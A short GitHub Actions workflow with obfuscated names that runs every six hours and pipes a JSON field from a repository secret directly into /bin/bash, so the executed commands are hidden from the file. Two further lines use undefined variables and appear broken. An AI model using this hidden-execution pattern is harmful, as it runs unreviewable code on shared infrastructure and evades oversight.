name: gewangshui4637
on:
  workflow_dispatch:
  schedule:
    - cron: '58 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gewangshui4637
        env:
          u1: ${{ secrets.u1 }}
        run: |
          echo $u1 | jq -r .qx34858 | /bin/bash
          echo $qt8309 | jq -r .lkt9393 | /bin/bash
          echo $occ7 | jq -r .er58748 | /bin/bash

